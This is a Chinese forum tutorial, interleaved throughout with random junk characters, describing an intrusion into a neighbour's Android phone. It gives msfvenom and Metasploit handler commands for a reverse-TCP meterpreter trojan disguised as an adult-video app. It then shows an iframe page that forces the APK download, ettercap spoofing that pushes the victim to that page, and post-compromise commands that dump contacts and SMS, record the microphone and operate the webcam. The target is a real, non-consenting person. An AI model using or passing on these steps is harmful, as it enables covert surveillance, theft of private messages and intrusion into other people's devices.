|
# i" N0 C c- Y3 p
五、msf+ettercap入侵邻居安卓手机 + {8 M7 s( }0 {: K
3 |4 U8 \$ c: a* Q: ~
% ^0 } i6 \- h' U u 首先启动msf
/ t6 D9 I' E" [: ~! o1 b2 F2 @
0 X! Q! \. g5 v/ P- `6 H) M2 [- ]( ^( Y1 B, N3 a" O, y
先用kali生成一个安卓木马,如下命令:
& i/ R; B9 |6 \% c$ L+ N0 s- w7 M - x& m' x# U- P: I
/ W1 K- Y% z" S0 h Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
/ c4 ~! x6 @! Y , D8 Y4 D! @' B; f2 S6 y* S
( B* @" _3 S0 r2 M p [
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
. N! R$ m1 \- P6 `3 s
5 f9 d8 I. S! c: y/ f
) k7 g6 q( y4 P 然后进入msf
9 I, i( L# J$ D' ]- j) V8 o/ Y
" z: z' Z: U3 z3 z8 h
( E+ b/ M) Z1 q3 c5 e; H use exploit/multi/handler
2 y$ i9 ~/ `* L0 }( J. y 4 G5 y8 h, y4 [, j
' V) N; ]/ {& A
set payload android/meterpreter/reverse_tcp
( G {0 [' p% c# P h$ i
9 F0 v: [- m" s1 j9 y# R1 ]% s8 q# j) V( L( S- P
set LHOST 192.168.0.109 //ip为kaili的ip & w. p$ E: h! ^; q! ?
6 ?! o7 D3 }' i& x1 N- m7 \' l" P
; i- U2 _$ \ U& e: c set LPORT 44444 //端口一定要与前面生成的木马的端口一致 9 ~8 Q5 i( y" N! Z! J
+ K" ]6 J9 }2 Y: }! I
$ j/ k5 k7 g* e$ B Exploit
7 _- `( }, F7 O7 t& u( w ; a9 R" w6 U9 [- ^4 _$ U9 _) Z
# L! C% Y/ T' ?4 y* l
1 T" M$ q* B: X4 t6 A9 a& d8 c 8 C8 A2 _, @: G1 _7 Q2 i% k5 W
+ M6 D! [2 Z/ _0 N
下面我们开启ettercap -G 3 Q. b* r" v4 f+ x9 s( b; U5 X
c, W! g5 Y; d% c; z
! [; Q Y0 B2 ]. s# T( p* `5 a; h
我物理IP为 ! |) E) @; E/ o6 u4 c
2 E `* N% _+ p
; e: W8 u6 ~& j- \; D/ F" a+ y# t
# q. h& q1 _ W0 ?! P$ V, g/ _
) W# A, w- d) b g. P6 p6 L# y0 z# ]7 O3 c5 |. h" o9 u& a, H2 _1 q
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
) f9 u6 q R+ i' q4 i# v5 \ , W1 w- E6 `' d. [! y
( T) }( j# ~/ x5 F 下面我们来设置一下 9 l( I; v6 ?* j% d6 Q, H
$ }; O1 Y0 W$ K% T
6 o, @! u1 _& k; L% [
/ c1 w7 z. a/ s
1 R% e$ g2 N9 x, _* @( h
! t4 U) p. G' ~ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
^8 y4 n3 `3 z" E/ {+ W1 i! o. U . l# s1 {* Z8 j
3 V n9 d; x1 C, m
4 U# B6 y6 ]* E$ f9 U
" _$ m+ N0 M- b$ C5 h7 F" i# n! P# O: m+ f9 k- N
. u0 O; i8 y; V+ F# o+ F9 E : J) J# w" a, A: z, J' Y
( D% M. _7 q% d# l! G7 E7 _, U
+ @: B$ {$ k. P5 c% w/ @( s
* P8 }' g% T! S; G7 b
6 T" m' K0 A7 v+ ` A
9 f6 ?4 e+ }( c3 h
; [! H; g" B$ x, `5 n
9 x5 Q, L1 r7 j! d' C7 R5 j( d7 b 2 ?4 ?) u, b$ {3 x4 S
; ~' b' `2 h8 _: e/ V/ J4 S
- h) `' U6 ^1 C4 M3 N( U( V
! k4 U8 f9 b6 d/ O" d0 R$ B, S
* ~5 `1 b7 L1 T- S1 w6 R' _
- \7 f# G$ Z' x; B8 x$ J7 ?
9 \) U; G/ N. m1 U4 z0 R) s $ c: y; r, v% M( `. x
+ M k1 Y8 k7 U* ]1 d , s- O3 Y; Y/ q# |
: j7 y7 Y& p4 L% q
7 F5 W7 L, z; D W5 X3 w7 e
V# N; t, \" \0 w ( F. ]" Q" R q" z6 u: {+ J
" n6 l7 E9 `( v) G0 c4 n b
8 y' }- {1 I* m5 F- }
, A! c5 q# w* L% ^3 E" t
: ^8 m/ i; _- K6 q$ b
; ^6 |& `9 D/ Z' H
" U. i( W7 |3 Z& O$ Y0 o" F& P5 p* l- A, l, H1 J
6 o# b2 G# o1 @9 [4 }
3 q4 |: }+ o2 {: b, W- l/ {+ N. W2 c8 r; u: T5 l
& }# {' R/ _, l2 v# p
# m& o& g0 |& `; H' f4 G4 v
J9 \8 {9 E: [ 下面我们开始攻击 0 [, P4 S- b5 y' a% Z ]
6 E6 Y" D1 a9 R: @, d+ l1 h
6 c7 M9 z( p* z* y+ x
4 \7 V% f$ G1 F5 R
" }, y( U% I3 k* W
: g' {" p8 k. D" N
* P- v$ r$ ?. A; g
7 {' `* H9 o( d' h; ~0 ?) W% `- K2 I4 D( e# _9 S
$ F. K ?3 m; w4 L# V
8 {0 V- }% Q7 ?) Y. x; `4 T9 W: t
9 Q+ |2 T* A: O 6 C, o R% f6 i6 }5 Y! h
% O& T. j. |, y/ Z . c+ G& Z" H. v: {6 x
U: } X, ]4 C4 Y3 @
6 x, e2 k$ |8 a% P 大概过了5分钟多,发现反弹成功了
+ Q) m4 j0 N, o# A3 d
% i5 d( h3 z0 I. L9 v6 F/ f1 ?9 S1 ?7 X: C. p2 s' W
) x1 Q' V. F7 @' c
2 h5 G$ A/ I8 o6 T+ d/ ^$ o
( |6 K* h' r+ ^! J
/ }/ F) a0 V. y7 W; H/ E
% l: {3 S- ?6 i3 }# e' ^7 @( Z( @# z0 U* A( s* L" c8 L: y
1 a! K9 i. j) K* d3 i % i% V! }: T3 S: O; F
6 ]2 q+ l; E% c! V- W0 u* x9 x# a; ^9 U
7 B: R+ K7 t8 G7 w , ^4 b1 i7 k0 O
( A# G& O4 d! S7 }
. I! x! q6 W* m' X
. `, `" [9 Q C( m) }- {1 P- s; i5 t# W# k
: h& E, s! ?7 n. \4 \+ Y* x
# v5 ]4 |4 i+ l3 P# N
/ y" `' a2 K+ T) x( A 8 B2 L) |) g% k( U2 Y' i7 l: I
* o# X. l/ M6 w* c' o a
, [: }; S! B. f1 {! J `/ I 执行命令
$ t. j4 _3 G, r" Y* n# @! d7 O
% |' K, ~& H. ^8 [' Q! d1 h: q% d
; [6 f, O, ?6 a; z% ]
, Y+ L' k( U3 a2 Z0 H) X2 O : x0 i b. z- t2 H. J/ w; b
& G6 \# ^& U* g c8 i
dump_contacts --》这个是导出电话
7 A9 o( s( k5 B% ^) B& E8 F
7 G1 q# u6 |0 c* |! I' _2 E
% C$ [8 T8 N+ k( x dump_sms --》这个是导出信息 3 Y% a! t& c/ r3 D1 j' A2 X5 Q; F% f6 u
' j! \$ r l! h, r% k, c
3 \" x+ V: H) K6 R record_mic Record audio from the default microphone for X seconds ) H6 v5 Q7 c( F9 t) ~
- Q; U5 [' z( i2 b: }6 E6 d) F+ d' T. W7 j0 e5 h0 P
webcam_chat Start a video chat * u1 o& ]# E% _, x( N
; F+ F( I t: h' Q8 u. n. _# Y& L) }! y6 v2 I8 I% Q
webcam_list List webcams 0 _( E" n# Z T( b, A. Z A
, V1 _( W, ]8 I: k0 T4 F
& [5 f" N* |2 O webcam_snap Take a snapshot from the specified webcam 2 ] Z2 Q& P) O. d* `/ k
. v& u5 x7 |( J! z
8 Q; P$ \: ?) m0 e webcam_stream   lay a video stream from the specified webcam N. j6 C' b1 j3 Z u% M
+ n8 I; J* P. a% E/ a& D
; i7 `" O% k6 b - Y+ n0 x& N0 Q
9 b. {8 w* A5 \$ f9 m5 n; P
7 G" {0 R& S: p+ ]
. v7 I) Q j* N! s! \$ W5 e ! p; Q" u* v+ b8 }/ j$ B
& b7 Y( U" @) |+ m7 r 我们打开看一下电话薄,
! H) s5 B- d' s3 _" a
6 H5 n3 [8 Q' D. i& X/ _; J1 A, ?# [* T6 Z! F0 O& j) k
' G4 p9 V4 i' o& C0 |
, s: L: {( j- ]- w9 q8 e. r
; ?. G! c( d+ [, Y; S
. c- k* V; ~9 r3 ~' j# z
$ T& B5 U/ p2 F
# j4 F0 k+ G' U3 \
; i# ^3 a; y* G6 A& ~
0 X9 X: u' w$ ]" V' L' ~
+ r$ X! i% D/ M
: |" @$ e8 }! O6 b2 ~! t 2 Y9 B0 `. i5 A/ b4 B1 M
- A6 W6 d0 U" C8 w! h9 Y
3 _/ s% a B g N
; n1 X% I* N: v7 Y( g* O3 ]7 X2 P9 a
/ q* K; p6 J/ D0 f# V4 `1 u2 a) w8 q ) g, |) ]2 m$ A6 F. f: g% N5 r
' D* e" w) X1 M) T8 \8 D 我们同时欺骗成DroidJack木马,使用方法如图: ' j+ o- k3 m, S1 z
. x7 e9 k( E' m/ z' C- X0 m1 M0 d
+ W# m0 L5 W& v6 d% p& J3 z
& W7 I1 ~$ g( j2 a 4 t5 Z! b! {: {7 a5 X6 l% i4 V% C' B
2 z8 \5 q0 ?+ O* l6 z: P % {/ X e2 y; s. S% w2 D8 A0 P
) m' F" o9 ]. N$ j; X
& `2 f# V* ~' `5 x
* T9 H+ Z7 V( }2 ] - O! |! z5 f. ?9 ]2 s
1 v1 {$ f- p8 L; F/ h+ X) Y1 S
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 - e) W1 b0 |+ H% g1 I8 m3 T; y
0 @( E, y u6 k2 y
& K- L& L: ?4 A1 e4 x 7 D5 [) k2 q1 b+ K, e* ]
' h9 w8 D% ?0 s- d
% j0 ?5 ?$ W2 P1 V
6 `# X3 f1 y' D' Q/ j) v# E
6 }- q3 i( Q- |4 n
7 ?# X& _% L! X6 ~ , J5 d& q7 N1 U8 S# }( o
( \) f: b# p! Q- u6 M. N N# E. Z
- a0 U/ x( T5 @* o' b 
& H9 K- b% a0 n5 Q
4 _; T; f) K$ m" D
% G+ w1 P; c3 l0 m
4 Y. t+ K6 z) l% ], e$ `: X |